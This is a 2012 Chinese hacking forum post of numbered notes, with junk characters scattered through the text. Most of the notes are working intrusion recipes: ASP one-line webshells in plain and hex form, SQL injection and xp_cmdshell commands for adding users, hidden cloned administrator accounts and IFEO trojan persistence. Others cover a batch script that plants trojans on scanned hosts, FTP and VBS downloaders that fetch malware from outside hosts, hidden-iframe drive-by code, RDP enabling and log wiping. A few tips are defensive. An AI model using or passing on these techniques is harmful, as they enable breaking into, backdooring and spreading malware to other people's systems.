找回密码
 立即注册
查看: 2832|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
& L& P+ r% k6 z, n  I+ q; Ncacls C:\windows\system32 /G hqw20:R+ l8 w! t" L. r( N3 [/ G
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
( E# d! v  k. O8 v" I" B: r恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F- c7 W1 x# G" K6 S4 L9 s7 Q
* }! b$ S5 ~7 \
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
6 j3 i$ H: h. a* Z
; v0 u. {* H1 @  e, e3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
1 @. T! Q7 g1 L1 [  c$ `6 I* }" A& X
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
8 o' d, r4 f" p
: v% J4 J9 n- N1 |$ p2 M  h5、利用INF文件来修改注册表9 X; q4 G# c7 ~' E6 g0 X( A' ~
[Version]! R' }8 s0 a1 m4 z1 Z) j
Signature="$CHICAGO$"2 ^* c8 u# O0 t/ _0 ~! b
[Defaultinstall]. c4 @1 f4 H) G* E' G! a
addREG=Ating! D0 i  a1 M% n$ Z  L
[Ating]
4 y# B& \: S7 E( SHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"& X7 t  o/ O  {! s: s$ q
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:3 x) ]0 A0 l2 D5 F0 _
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径! Q* p8 R/ |2 M3 O$ \
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
' I" V& `. W. RHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 c, G0 p  r2 g7 C# l% r0 S
HKEY_CURRENT_CONFIG 简写为 HKCC
5 H6 A! c4 t& t- X4 o0 H0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
* b$ _% o" C) H* o2 _"1"这里代表是写入或删除注册表键值中的具体数据
+ X; a& Q. Y8 E
2 ?: F7 P2 k0 A$ ?6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
# `% \; F' m! k$ {" X/ \4 A5 i多了一步就是在防火墙里添加个端口,然后导出其键值2 L7 t. h' d$ Z' q
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]+ g5 |; j; T  g( m
$ U8 ], a9 F; Q5 J; J
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ ]) f& `- l/ R% }- I( E
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。# b! w! e: m: B* E. A! v8 e* l! A

- q& Q5 @1 A' H  v6 N8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。: G& m$ a/ ^6 \/ V

6 ^1 ?2 d- G' u$ B. y( s9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ Q1 j& d/ a) v. d
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。2 `7 }& l$ a: S! y4 @4 h8 U

* @" K0 z* g- Q  i+ {10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
0 |2 R% l. m9 H6 U* Z1 H+ F1 y+ p, {) ]  e5 K- M! g2 i
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
! p& g! _! ^1 m- X0 e! X用法:xsniff –pass –hide –log pass.txt+ H- }, O3 X( [7 W+ c3 R3 i- h
  A5 J% l8 A/ k8 a# f
12、google搜索的艺术- S9 D6 h0 i% N# J* F
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
3 B+ S% P  P* F) H5 c或“字符串的语法错误”可以找到很多sql注入漏洞。7 _0 L3 [6 O8 z7 b4 P
+ J8 J* b- }8 u% X% F  ?
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
7 e& D( d; J+ Z  M) G$ M$ \  k7 Q1 i1 v0 R' d( K. h
14、cmd中输入 nc –vv –l –p 1987
' t# r9 `0 Z/ `' A" U做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃% h6 W) h3 _: T# w7 i! {. D
- A+ L: e* q& V6 `' g6 S/ Y
15、制作T++木马,先写个ating.hta文件,内容为: d" y2 I$ ]6 S4 X5 Z' j- b0 P
<script language="VBScript">" s7 F+ a; f4 |
set wshshell=createobject ("wscript.shell" )
/ s" q5 s% G. L$ O5 qa=wshshell.run("你马的名称",1)3 g; M6 k& d7 w! ?, D
window.close
/ T3 X+ w" e2 x4 k. H5 L, K* w</script>
; w. Y9 c+ \9 R' a再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。' V4 g5 B- J7 {2 v/ s9 Z& B
# E8 |2 L! c/ I
16、搜索栏里输入
+ {- _( v: k( H! A关键字%'and 1=1 and '%'='7 }+ t; `: m  n! I3 }7 M- B* x
关键字%'and 1=2 and '%'='& q1 r% b% T9 ]) U5 _5 B) z) E
比较不同处 可以作为注入的特征字符* y1 V, P0 a( m- j" O+ t# {

) t4 _( h$ d! r4 }# }7 J" k17、挂马代码<html>9 m* _' B4 O+ d7 n" C
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
' j5 K" c3 \0 v+ v</html>* u, I4 {1 Y4 q$ r) F# ~
, f0 m: y, \$ y# G$ e2 l+ E
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,  `2 {9 _: h, `- N* N
net localgroup administrators还是可以看出Guest是管理员来。
, J% I8 K  k: B& K' h- w2 z+ @( s
* f" Z8 U5 x, z2 I9 U& _8 |19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
7 _1 Z- m6 Q# u/ `* X4 H用法: 安装: instsrv.exe 服务名称 路径) G$ a6 ~( o$ }/ ?5 r
卸载: instsrv.exe 服务名称 REMOVE# l) y) i' F9 k8 }0 |' o- R- n

, ]/ {! B2 X/ u  w* x" V/ Z! _- L2 W% z
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉' k, q1 R  L* U& ?. q! y% ^
不能注入时要第一时间想到%5c暴库。+ K# W/ X4 w0 j$ i% k- e
0 p7 m  Z- O3 u8 j4 D
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 _* z4 l* u0 Q! G! T% ?: c8 G7 J4 \! c$ l& D; Y
23、缺少xp_cmdshell时2 ~) L8 z( w3 t  H4 M9 D! c* ]
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
4 H, d" Q6 P: M+ O- R  m6 D假如恢复不成功,可以尝试直接加用户(针对开3389的)
! h7 W* q  |; s' I$ }$ edeclare @o int4 p# J0 Y) V& x! v! ?
exec sp_oacreate 'wscript.shell',@o out
9 R6 k! o/ K0 {7 t' Cexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员$ r) v. Y- P( p. P: D* @8 W( U
$ a' a/ B+ r+ w
24.批量种植木马.bat
8 [5 P9 [) s5 g% M3 x' A1 W; ?# Bfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
3 e6 W6 [9 f8 @* c7 ^+ c! C# T8 }for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
( |. r- q* H; I0 A% i- w* o0 @扫描地址.txt里每个主机名一行 用\\开头, q8 Z0 `, m$ S& a$ ~" X$ q

5 y8 I; ?$ v  k/ o, _25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。0 l2 k8 E5 O. n" T
2 e) ^* E! ~$ c, T" U! Q
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名." ^/ Y+ o/ [% p1 T( c
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
+ e- W9 E+ G- F5 y( W- ?" h.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
( a4 F5 [# ~( o8 G7 Z4 J
! v5 K! C6 u" {5 T6 S27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
. ~, \% w" R" \+ T/ n然后用#clear logg和#clear line vty *删除日志
3 @( `" \: T# n" \5 ~7 E2 b
% J8 P& a. S9 S- w  I0 C& u28、电脑坏了省去重新安装系统的方法
& s: H; ]) ]3 Q2 Y* J% ~* R纯dos下执行,
( h5 }4 R# y' L* s$ m8 `  mxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
9 |7 O8 y* D) Y& c! R2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
; e" u7 F6 S4 J: k: h  h
- L0 N) F/ Q. h( y2 v29、解决TCP/IP筛选 在注册表里有三处,分别是:
. j6 G+ m5 s  K7 s' E3 |4 n/ eHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip0 ]) `% D# R& @, [2 F; A
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 d6 \9 L! K: @6 h9 \
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" Z, f3 c0 n. v$ g& x
分别用
- a# [( c% i; s4 o5 xregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 E  C% Z0 o! U3 B
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip$ d! `, t. k: z. [  ~' \
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 F0 J+ `- R2 P: P9 \4 ~6 v命令来导出注册表项% L* L* T7 R5 d9 T
然后把三个文件里的EnableSecurityFilters"=dword:00000001,) ]; C, Q( H3 x
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
* C8 c6 n8 r4 X4 q. Dregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
4 e. e- t; @8 S
; ^0 h0 u7 N2 s9 I1 i! `30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
" C! R& ^+ F9 g: n3 G  o$ m% JSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
9 m3 p. i4 F8 S7 W8 q4 B: @  v. T" K; ?" r% T
31、全手工打造开3389工具9 g2 S! ^+ C0 Q5 k3 k$ C& X
打开记事本,编辑内容如下:
4 a6 U" q4 t1 U7 d7 Qecho [Components] > c:\sql
7 ~1 \# ]' h1 o0 B9 I) Becho TSEnable = on >> c:\sql
2 Q% c) U+ h* b  e5 b: Bsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
& l. x, B# ]% Y+ T9 \' L4 Y9 o编辑好后存为BAT文件,上传至肉鸡,执行
( x  s6 ^% A/ W5 B$ F3 N- c- o; h/ O8 F
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
* p/ n; i, ~1 Y* l5 \  z
1 q; `1 n! [( E% q1 X33、让服务器重启
9 |- r) o; x0 F3 N+ o; }写个bat死循环:
0 T& l* S" Q' N@echo off) O( d, P0 `9 x9 z5 k( x
:loop16 t9 f7 v9 X) G9 L8 O! ]+ b
cls6 Y+ m0 I- j3 ]6 o0 v
start cmd.exe6 f' p  d# F0 |) e6 [! T
goto loop1
( I# k2 Z5 l' x! B2 p. h' H; o3 N保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
& [. t0 {5 s; {7 N8 z  @/ J# B8 S! }$ ~# B& c9 o
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
; ~/ a/ K& g$ W; b4 d6 M& w/ X/ z@echo off7 d( ?0 G+ j& Z7 a. Y  }5 w
date /t >c:/3389.txt
3 t2 I) L, [' {) ?0 t: L" ktime /t >>c:/3389.txt" j  n9 r- ^, P
attrib +s +h c:/3389.bat6 {6 ^2 a2 R/ V3 i5 e4 e
attrib +s +h c:/3389.txt
  g% s& v4 B0 Q/ p! i$ |* x- lnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt% }- {- k! R% ?' b7 C, g* b
并保存为3389.bat
. S' h, E* w' \3 d$ n! j打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号" u4 Q0 h1 W8 ]) O' r

$ [. L, V1 b# n35、有时候提不了权限的话,试试这个命令,在命令行里输入:
: y9 P8 D9 m/ qstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页): k- v. p! m: O, ]( t
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- F: Y) v) f' w
; }' V0 B* k5 b! M
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件& }8 m* j; }3 N
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址6 ?1 [5 D& A5 X& ]' X! s/ Q
echo 你的FTP账号 >>c:\1.bat //输入账号8 T0 `; p3 c) y3 u% G' x: _# M
echo 你的FTP密码 >>c:\1.bat //输入密码- y* ]  d, t* `# l
echo bin >>c:\1.bat //登入
' G/ l, }: l7 P& [7 s1 Y* A: Secho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么, g+ C- e- _$ j- P# b& X
echo bye >>c:\1.bat //退出+ A# _4 n" k" m+ h$ E' n
然后执行ftp -s:c:\1.bat即可
/ y2 `4 L3 y: B
6 u1 S  P' a/ {37、修改注册表开3389两法  r' J" d& i; Y- S) O
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
, @* S2 _# I) k8 U' Jecho Windows Registry Editor Version 5.00 >>3389.reg
- I9 r5 f. k5 ]7 Z) P/ wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
3 Z  U! S( w1 ]7 Z+ l% `+ G/ m" n: n6 Z5 X! Vecho "Enabled"="0" >>3389.reg
' q% t& W; U$ k7 i) l. y; |: j- Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows2 n3 }/ A4 i  g2 F0 x, q0 w
NT\CurrentVersion\Winlogon] >>3389.reg
& P2 z; q4 a% \: x9 |. S1 {echo "ShutdownWithoutLogon"="0" >>3389.reg
( ]! f' x5 X9 ~. F3 cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]# U( E; n( ~& d9 i  N& p
>>3389.reg6 w3 p" d9 o; ~+ o7 S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ A4 {  d! P  F4 K2 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 @. @9 j4 d3 W1 E+ E8 a0 d>>3389.reg
- a- O! e" a9 P1 Y7 \echo "TSEnabled"=dword:00000001 >>3389.reg
( f0 W" u% ~* C! i  {8 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
) W: A9 L6 i) J2 o- T; F4 ]5 u6 Aecho "Start"=dword:00000002 >>3389.reg
9 t( Z3 a/ P* z6 t. yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]" B2 S4 T) F7 b6 w# q/ d
>>3389.reg
9 j3 m% ]5 \$ M' e5 \echo "Start"=dword:00000002 >>3389.reg' Y0 j) S; b6 J' @2 _2 {5 i
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg1 \  q+ O) s  T0 M+ {7 S
echo "Hotkey"="1" >>3389.reg
5 [; D9 }) A+ b% Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ _1 z* b* c2 V6 V0 _: M; F% a& ~; Z& c  }Server\Wds\rdpwd\Tds\tcp] >>3389.reg6 I8 e+ y4 R3 ^: U$ C  L
echo "PortNumber"=dword:00000D3D >>3389.reg  W/ }( H) p% L' H) h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* L2 _3 j- \, ~; m6 }+ V+ UServer\WinStations\RDP-Tcp] >>3389.reg
' v; B, a; D9 D# D* @0 [: b! J" V- techo "PortNumber"=dword:00000D3D >>3389.reg
3 h2 S, N8 @! [& @/ K把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。* y7 T  Y$ K! |9 `
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
: U& h) \# R2 m6 I% n$ }因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效3 F7 V2 y- ~, I; F2 ^0 U) c
(2)winxp和win2003终端开启+ j/ _8 i5 c" Z# }6 h+ x
用以下ECHO代码写一个REG文件:
/ C' x7 z/ N1 f+ aecho Windows Registry Editor Version 5.00>>3389.reg
* Y# B1 U. n: C5 a/ oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ `7 B, x% j% r, z
Server]>>3389.reg8 ^1 d6 B2 L7 f3 R2 a
echo "fDenyTSConnections"=dword:00000000>>3389.reg
9 f4 ~& r+ ~8 gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 J9 @6 d3 n0 G; z# jServer\Wds\rdpwd\Tds\tcp]>>3389.reg5 g& k( t3 {  W& a+ @/ \
echo "PortNumber"=dword:00000d3d>>3389.reg' l% P) t" T) o6 v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- R8 ?& q0 i  W0 d) R& l( Q! Z* h9 hServer\WinStations\RDP-Tcp]>>3389.reg4 |; W8 L/ d$ X  q1 y3 {. s" p
echo "PortNumber"=dword:00000d3d>>3389.reg: }, M  a+ w4 e+ o6 O. x
然后regedit /s 3389.reg del 3389.reg
- `" m' ^# e: XXP下不论开终端还是改终端端口都不需重启
* Q" X% ]. y4 g* x& u
5 r* v4 i5 B% o; J: b38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃* N2 v$ W0 `9 |* a$ q3 M7 Q
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
8 G8 `: ]8 Z" F  y
% S4 M# ~& u& Z4 Y% r3 k39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
3 h; i- I$ q3 q) S2 v+ d! O: Q% t(1)数据库文件名应复杂并要有特殊字符  E0 ]7 v# P& F6 \
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
/ \0 k( b7 a$ w# C将conn.asp文档中的
  i3 P( V1 }  ~& r9 u3 T0 @6 vDBPath = Server.MapPath("数据库.mdb")
9 m% d/ x1 ?1 c: A5 J8 ~5 G3 _conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath+ h# v4 q- U2 `4 |2 W

: a. V0 `* o$ m: {7 \5 u- }修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置; B; v4 q# i% _
(3)不放在WEB目录里, `; D. k+ R: ?/ N, |; I
+ ^" |/ I& z+ ~1 ^4 V& i/ i
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 v1 {1 z: d$ f  z
可以写两个bat文件& _' N  m9 H% N3 H2 U) m( D
@echo off5 k* B9 W( I9 f0 L
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
* o; c6 q: v2 |% z- _1 E& l$ V6 k@del c:\winnt\system32\query.exe/ B3 g  d- `8 F; d% H0 y
@del %SYSTEMROOT%\system32\dllcache\query.exe
( m5 r3 f3 }3 r5 i7 V@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的7 b6 [4 m# _8 }( @2 c! U- `+ T
; v/ p$ P- V, C, L+ }
@echo off
4 q+ |; A! V$ x, U' ]* d, P@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 m. s$ o* r8 W
@del c:\winnt\system32\tsadmin.exe- |. I0 o' \2 \+ u, `! A9 Z2 m
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex& d; l8 n* r9 [3 {9 y
# c2 x! S& l! s' p8 l
41、映射对方盘符
( }+ W9 e% u4 `telnet到他的机器上,
' W4 {! w! y+ e' Q& J* A! Q; B9 e0 ^net share 查看有没有默认共享 如果没有,那么就接着运行1 S8 j2 M  @. @6 V) ^# Y8 R+ c1 E1 g
net share c$=c:5 v' F/ i) d6 e/ I/ D  p
net share现在有c$
0 T* w$ Y: k5 Q0 P3 b0 o9 U在自己的机器上运行
+ s: i8 w: N) Ynet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
! ]; B, ~  W0 s7 G0 x7 e1 M0 ?
: d$ d; X. U: f1 y42、一些很有用的老知识& @. y0 c1 O" o9 g+ y/ n. O
type c:\boot.ini ( 查看系统版本 )+ H) h" d0 O" i# L1 Z
net start (查看已经启动的服务)
8 Z& i0 Y8 r9 N: |4 Y9 Nquery user ( 查看当前终端连接 )# I3 }$ ~( ?7 d2 V0 w3 d2 U
net user ( 查看当前用户 )3 w8 g9 i: C+ N$ H
net user 用户 密码/add ( 建立账号 )
9 o, S) l' l1 j5 P6 Hnet localgroup administrators 用户 /add (提升某用户为管理员)* ]/ w5 ?' e; \& D/ L! t( t
ipconfig -all ( 查看IP什么的 )- ~4 Q0 i: E5 F* }7 l& K* C
netstat -an ( 查看当前网络状态 )% m! a+ K! z( @# ^  M7 V$ C
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
+ \: j+ R* q5 d克隆时Administrator对应1F4
9 a& J& X6 U# v) @: Hguest对应1F57 m( O6 b# m4 X' f; u7 C* v$ q# ^
tsinternetuser对应3E8+ l4 z  i( H) J7 u7 f
" l! [  G7 u4 U4 u$ F1 V
43、如果对方没开3389,但是装了Remote Administrator Service4 }# S: m: R: {& Z  L
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接' ?2 I" l1 Z  J- Z/ {$ ?& h
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息. w# u" e! C. N/ i  v6 M) k; s* b
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
2 k$ W; q2 Z1 s4 }* ^: E3 u: K9 ~0 ~" |; Y& x3 z# B
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)+ Q5 J4 w  t: o: r7 _
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
' K" |; t. ^/ l9 a; O" K! z* H0 T6 o$ z
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)9 {& F  _5 w% m/ ^3 }1 ~" t* n
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
: P4 q0 w; U9 a6 B. j, M8 S^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =+ H( t& m, T5 E( l0 Q0 m3 }" n
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ Q& W1 z: i: h8 B5 m; M8 r: @1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs2 S" T, `2 \2 ^9 Y, B, c$ j) k# S
(这是完整的一句话,其中没有换行符)+ E( R. Q  _/ `$ @3 Q3 b
然后下载:
+ c; W8 D* f: ~( ?cscript down.vbs http://www.hack520.org/hack.exe hack.exe8 j6 i* G7 I7 F: B) J+ D

# p% c. T8 K( H: g46、一句话木马成功依赖于两个条件:$ ?" F0 }6 ^8 N# x4 Z: Q' e' b
1、服务端没有禁止adodb.Stream或FSO组件
( z) N# Y" N5 ~7 }, k, @2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 G/ q! O; s6 \, U- F6 X$ ]$ c) m) C5 `- x/ y& v
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' A+ h9 \0 V9 l( f% {# L, K# C;alter database utsz set RECOVERY FULL--
; }7 e' R1 u; x( J5 R;create table cmd (a image)--
- ?( t8 B+ O; i; ~0 x3 j  K2 `;backup log utsz to disk = 'D:\cmd' with init--
8 P- u+ z! e# @: ?5 X;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--: w' O  L5 x; I, O9 Y' C4 ~
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
  r! }5 l! e, N7 A注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。  a" v, m( J, P0 g+ q

& j6 o% E3 k* U& n" Q6 z6 B( |48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 Z6 l9 l: R9 G
, q( @. F" }6 K& r: E) P. _
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
& Z0 z- ]  Z# I$ L5 T, }: O9 V/ H所有会话用 'all'。
7 E) i8 t1 x$ a, a) m-s sessionid 列出会话的信息。
9 B7 O1 P) w1 L- H8 E- u8 |-k sessionid 终止会话。0 b& k% r# u5 {
-m sessionid 发送消息到会话。6 D% ]9 u* D9 j$ c1 |

, l' I5 h) Z( I; m1 ?config 配置 telnet 服务器参数。7 J/ m7 x+ n: R0 q
7 s+ K! u: q5 T, t% i
common_options 为:8 h5 O! A7 x/ ^7 @" y7 A( P
-u user 指定要使用其凭据的用户
' s+ Z0 x# M  o- k) i, l3 F6 d* O9 R" U-p password 用户密码
+ b; Z- o. |# W* W' l) w3 x
; M9 U( O. k, o1 b- Xconfig_options 为:
/ L; ]8 R- E$ [3 Idom = domain 设定用户的默认域
" m9 n1 u! v. P' Q5 xctrlakeymap = yes|no 设定 ALT 键的映射" ]* h% ]+ w8 _# L* ]4 }  S2 [
timeout = hh:mm:ss 设定空闲会话超时值
/ t$ ]: T# c. r4 t, Jtimeoutactive = yes|no 启用空闲会话。; H+ Q( D2 X# ^
maxfail = attempts 设定断开前失败的登录企图数。
' M, u$ T0 f2 _( f5 `/ R) Smaxconn = connections 设定最大连接数。: a* S4 A7 J+ ], u
port = number 设定 telnet 端口。7 }) @' G! n2 M% |
sec = [+/-]NTLM [+/-]passwd  C, p7 L; O. `* m9 r
设定身份验证机构: h" p5 g, E2 A# ]7 ]0 q( D
fname = file 指定审计文件名。$ t7 g" [+ J+ D
fsize = size 指定审计文件的最大尺寸(MB)。
! s  N6 V& n, X. ~/ u. Kmode = console|stream 指定操作模式。
3 y- Y/ L/ j& u) P, Zauditlocation = eventlog|file|both
3 e# R( `3 @) X9 a指定记录地点$ z5 P+ ]0 N0 |& A) q* [( W
audit = [+/-]user [+/-]fail [+/-]admin
3 L! m4 C& U: O% z+ c
' I3 W1 ]5 [: o1 J, a9 q  j$ N49、例如:在IE上访问:
) o9 r0 G% y; B; l- \www.hack520.org/hack.txt就会跳转到http://www.hack520.org/  b  A1 R& |  N. l, B/ ~
hack.txt里面的代码是:
5 R. {! s2 p% L: _<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">5 n+ X6 c& q  L+ h, q) ~- B
把这个hack.txt发到你空间就可以了!& ]5 ^/ P5 [! Z3 H! t& [' `* @/ Z
这个可以利用来做网马哦!
3 k7 B, H( A; ~9 p2 n2 W/ Y4 {' E$ c8 u* G8 r9 c3 e
50、autorun的病毒可以通过手动限制!
* ~5 z5 c7 S6 t! N4 |- {. f1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!, ^, I  @# i! Z3 M6 l
2,打开盘符用右键打开!切忌双击盘符~7 C1 F5 S; n1 x$ q" f! g; `
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!( G1 S  u' m; m; ~$ K5 t5 S* v0 b

7 p2 }1 A8 ^' a0 q- f# n+ F51、log备份时的一句话木马:
0 }! f8 U  k* ra).<%%25Execute(request("go"))%%25>
. u! g: h! z# |: ab).<%Execute(request("go"))%>
